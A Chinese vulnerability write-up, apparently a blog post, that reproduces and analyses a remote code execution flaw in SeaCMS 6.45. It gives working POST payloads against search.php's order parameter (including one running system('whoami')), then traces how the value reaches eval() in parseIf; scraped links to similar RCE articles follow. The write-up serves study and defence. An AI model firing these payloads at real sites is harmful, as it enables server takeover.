环境搭建

1、下载安装包

下载地址:

链接:https://pan.baidu.com/s/1uw_VnxnvG4GGEae4TRsGGw

密码:cd48

2、常规安装

漏洞复现

poc1:

http://127.0.0.1/seacms645/search.php

post:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}

poc2:

POST:

searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);//}{end if}&func=system&cmd=whoami

searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);if(1}{end if}&func=system&cmd=whoami

漏洞分析

0x00 代码执行简单流程

0x01 分析

总的来说就是:$order参数没做严格的限制,就将其传入了模板文件中,然后使用eval()执行模板中包含$order的代码,通过闭合拼接语句的方式,插入恶意代码,实现远程命令执行。

首先是从seacms_6.45/search.php入手,这个文件包含了seacms/include/common.php,在common.php中第45-48行,将GET,POST等请求传入的全局变量中的键值对转换成变量,并对其中的值使用addslashes()进行处理:

function _RunMagicQuotes(&$svar)

{

	if(!get_magic_quotes_gpc())

	{

		if( is_array($svar) )

		{

			foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);

		}

		else

		{

			$svar = addslashes($svar);

		}

	}

	return $svar;

}

foreach(Array('_GET','_POST','_COOKIE') as $_request)

{

	foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);

}

在seacms/search.php文件第63行,echoSearchPage()函数中,将$order变量注册成全局变量:

global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;

而在search.php中,执行echoSearchPage()函数之前,没有对$order变量进行处理。在echoSearchPage()函数中,使用$searchtype来选择使用的模板文件:

if(intval($searchtype)==5)

	{

		$searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/cascade.html";

		$typeStr = !empty($tid)?intval($tid).'_':'0_';

		$yearStr = !empty($year)?PinYin($year).'_':'0_';

		$letterStr = !empty($letter)?$letter.'_':'0_';

		$areaStr = !empty($area)?PinYin($area).'_':'0_';

		$orderStr = !empty($order)?$order.'_':'0_';

		$jqStr = !empty($jq)?$jq.'_':'0_';

		$cacheName="parse_cascade_".$typeStr.$yearStr.$letterStr.$areaStr.$orderStr;

		$pSize = getPageSizeOnCache($searchTemplatePath,"cascade","");

	}else

	{

		if($cfg_search_time&&$page==1) checkSearchTimes($cfg_search_time);

		$searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/search.html";

		$cacheName="parse_search_";

		$pSize = getPageSizeOnCache($searchTemplatePath,"search","");

	}

在if语句中可以看到,当$searchtype 的值为5的时候,传入了%order参数,因此这里的$searchtype需要取值5。

下面153行,将模板文件读取到$content变量中:

$content = parseSearchPart($searchTemplatePath);

接着在155-173行替换标签。其中第158行使用$order替换了模板中{searchpage:ordername}标签:

<a href="{searchpage:order-time-link}" {if:"{searchpage:ordername}"=="time"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderhits">最新上映</a>

<a href="{searchpage:order-hit-link}" {if:"{searchpage:ordername}"=="hit"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderaddtime">最近热播</a>

<a href="{searchpage:order-score-link}" {if:"{searchpage:ordername}"=="score"} class="btn btn-success" {else} class="btn btn-default" {end if} id="ordergold">评分最高</a>

接着,在本文件的第212行:

$content=$mainClassObj->parseIf($content);

跟进去,在seacms\include\main.class.php中第3098-3147行中:

function parseIf($content)

{

    if (strpos($content, '{if:') === false) {

        return $content;

    } else {

        $labelRule = buildregx("{if:(.*?)}(.*?){end if}", "is");

        $labelRule2 = "{elseif";

        $labelRule3 = "{else}";

        preg_match_all($labelRule, $content, $iar);

        $arlen = count($iar[0]);

        $elseIfFlag = false;

        for ($m = 0; $m < $arlen; $m++) {

            $strIf = $iar[1][$m];

            $strIf = $this->parseStrIf($strIf);

            $strThen = $iar[2][$m];

            $strThen = $this->parseSubIf($strThen);

            if (strpos($strThen, $labelRule2) === false) {

                if (strpos($strThen, $labelRule3) >= 0) {

                    $elsearray = explode($labelRule3, $strThen);

                    $strThen1 = $elsearray[0];

                    $strElse1 = $elsearray[1];

                    @eval("if(" . $strIf . "){\$ifFlag=true;}else{\$ifFlag=false;}");

                    if ($ifFlag) {

                        $content = str_replace($iar[0][$m], $strThen1, $content);

                    } else {

                        $content = str_replace($iar[0][$m], $strElse1, $content);

                    }

                } else {

                    @eval("if(" . $strIf . ") { \$ifFlag=true;} else{ \$ifFlag=false;}");

                    if ($ifFlag) {

                        $content = str_replace($iar[0][$m], $strThen, $content);

                    } else {

                        $content = str_replace($iar[0][$m], "", $content);

                    }

                }

            } else {

                $elseIfArray = explode($labelRule2, $strThen);

                $elseIfArrayLen = count($elseIfArray);

                $elseIfSubArray = explode($labelRule3, $elseIfArray[$elseIfArrayLen - 1]);

                $resultStr = $elseIfSubArray[1];

                $elseIfArraystr0 = addslashes($elseIfArray[0]);

                @eval("if({$strIf}){\$resultStr=\"{$elseIfArraystr0}\";}");

                for ($elseIfLen = 1; $elseIfLen < $elseIfArrayLen; $elseIfLen++) {

                    $strElseIf = getSubStrByFromAndEnd($elseIfArray[$elseIfLen], ":", "}", "");

                    $strElseIf = $this->parseStrIf($strElseIf);

                    $strElseIfThen = addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen], "}", "", "start"));

                    @eval("if(" . $strElseIf . "){\$resultStr=\"{$strElseIfThen}\";}");

                    @eval("if(" . $strElseIf . "){\$elseIfFlag=true;}else{\$elseIfFlag=false;}");

                    if ($elseIfFlag) {

                        break;

                    }

                }

                $strElseIf0 = getSubStrByFromAndEnd($elseIfSubArray[0], ":", "}", "");

                $strElseIfThen0 = addslashes(getSubStrByFromAndEnd($elseIfSubArray[0], "}", "", "start"));

                if (strpos($strElseIf0, '==') === false && strpos($strElseIf0, '=') > 0) {

                    $strElseIf0 = str_replace('=', '==', $strElseIf0);

                }

                @eval("if(" . $strElseIf0 . "){\$resultStr=\"{$strElseIfThen0}\";\$elseIfFlag=true;}");

                $content = str_replace($iar[0][$m], $resultStr, $content);

            }

        }

        return $content;

    }

}

这段函数主要功能是将输入的参数与正则匹配,之后进入eval()函数执行。

正则:

3102: $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");

3105: preg_match_all($labelRule,$content,$iar);

要想进入到eval(),$content中必须含有{if:字符串,看代码执行流程,在eval()函数中,$strIf就是之前preg_match_all()中第一个(.*?)匹配出来的值。

@eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");

在eval()中,要闭合前面的if语句,可以构造1)phpinfo();if(1,又要符合正则{if:(.?)}(.?){end if},再看标签:

<a href="{searchpage:order-time-link}" {if:"{searchpage:ordername}"=="time"} class="btn btn-success" {else} class="btn btn-default" {end if} id="orderhits">最新上映</a>

由于$order替换的是{searchpage:ordername},所以,在1)phpinfo();if(1基础上添加:

}{end if}{if:1)phpinfo();if(1}{end if}

漏洞利用的基本流程就是这样,简单来说,就是有个可控的变量没有经过过滤,就被带入了eval()中,导致了代码执行。

参考

https://mengsec.com/2018/08/06/SeaCMS-v6-45%E5%89%8D%E5%8F%B0%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://github.com/SecWiki/CMS-Hunter/tree/master/seacms/SeaCMS%20v6.45%E5%89%8D%E5%8F%B0Getshell%20%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C

seacms_6.4.5 前台任意代码执行漏洞分析的更多相关文章

  1. 干货|CVE-2019-11043: PHP-FPM在Nginx特定配置下任意代码执行漏洞分析

    近期,国外安全研究员Andrew Danau,在参加夺旗赛(CTF: Capture the Flag)期间,偶然发现php-fpm组件处理特定请求时存在缺陷:在特定Nginx配置下,特定构造的请求会 ...

  2. phpcms前台任意代码执行漏洞(php<5.3)

    phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞 /phpsso_server/phpcms/libs/functions/global.fu ...

  3. Discuz! 6.x/7.x 版本 前台任意代码执行漏洞

    一.漏洞原理: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞. include/global.fun ...

  4. WordPress wp-includes/functions.php脚本远程任意代码执行漏洞

    漏洞名称: WordPress wp-includes/functions.php脚本远程任意代码执行漏洞 CNNVD编号: CNNVD-201309-166 发布时间: 2013-09-13 更新时 ...

  5. php 168任意代码执行漏洞之php的Complex (curly) syntax

    今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php?only=1&showHt ...

  6. 20.Ecshop 2.x/3.x SQL注入/任意代码执行漏洞

    Ecshop 2.x/3.x SQL注入/任意代码执行漏洞 影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二 ...

  7. 记一次海洋cms任意代码执行漏洞拿shell(url一句话)

    实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...

  8. 修复Apache Log4j任意代码执行漏洞安全风险通告

    2021年12月10日 0x01漏洞背景 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具.该工具重写了Log4j框架,并且引入了 ...

  9. [转帖]Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626)

    Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626) ADLab2019-03-15共23605人围观 ,发现 4 个不明物体安全报告漏洞 https://www.f ...

随机推荐

  1. 转载acm几何基础(2)

    判断两条线段是否相交: 矢量 如果一条线段的端点是有次序之分的话,那么这种线段就称为 有向线段,如果有向线段p1p2的起点p1在坐标的原点,则可以把它称为矢量p2 矢量的加减 设二维矢量 P = (x ...

  2. qt creator源码全方面分析(4-3)

    内外命名空间 QtCreator源码中,每一个子项目都有内外两层命名空间,一个是外部的,一个是内部的. 示例如下 namespace ExtensionSystem { namespace Inter ...

  3. 系统通配符号、系统正则符号,grep

    系统通配符号.系统正则符号,grep 1 系统通配符号 系统通配符号:借助通配符号 匹配文件名称信息 1.1 *: 匹配所有(任意)字符信息 找寻以old开头的文件 find /oldboy -typ ...

  4. VSCode最强助攻

    VSCode最强助攻 VS Code是前端界必备的开发工具.页面仔小杨简单介绍几款高效.好用的插件,让原本单薄的VS Code如虎添翼,开发效率倍增. vscode-icons vscode-icon ...

  5. 吴恩达机器学习week2

    1.Mean normalization(均值归一化) 我们可以将均值归一化理解为特征缩放的另一种方法. 特征缩放和均值归一化的作用都是为了减小样本数据的波动使得梯度下降能够更快速的寻找到一条'捷径' ...

  6. scala 中 Any、AnyRef、Object、AnyVal 关系

    Any,是 scala 中的抽象类,不能实例化 AnyRef 继承于 Any,它是一个 trait AnyVal 继承于 Any,它是一个抽象类,目的是消除基本类型,scala中只有引用类型,仅此作用 ...

  7. HMM-前向后向算法

    基本要素 状态 \(N\)个 状态序列 \(S = s_1,s_2,...\) 观测序列 \(O=O_1,O_2,...\) \(\lambda(A,B,\pi)\) 状态转移概率 \(A = \{a ...

  8. Wpf 正常关闭程序 Gc 来不及回收?

    最近在使用Udp开发客户端,发现很长时间GC都无法回收UdpClient,所以我决定强制标记Gc,非常奇怪的是,毫无作用,在Windows任务管理器中,也看不见程序的身影.简单来说,gc是系统为你独立 ...

  9. [hdu5164]ac自动机

    中文题目:http://bestcoder.hdu.edu.cn/contests/contest_chineseproblem.php?cid=563&pid=1003 首先贴一下bc的题解 ...

  10. python解析excel中图片+提取图片

    解析表格是常用的技术.但是有些表各里面有图片怎么办?我想获得表格里面的图片,值得注意的是,图片没有位置信息,所以最好给图片进行编号,编号代表位置. 下面附上提取表格里面图片的代码.只要输出表格地址,和 ...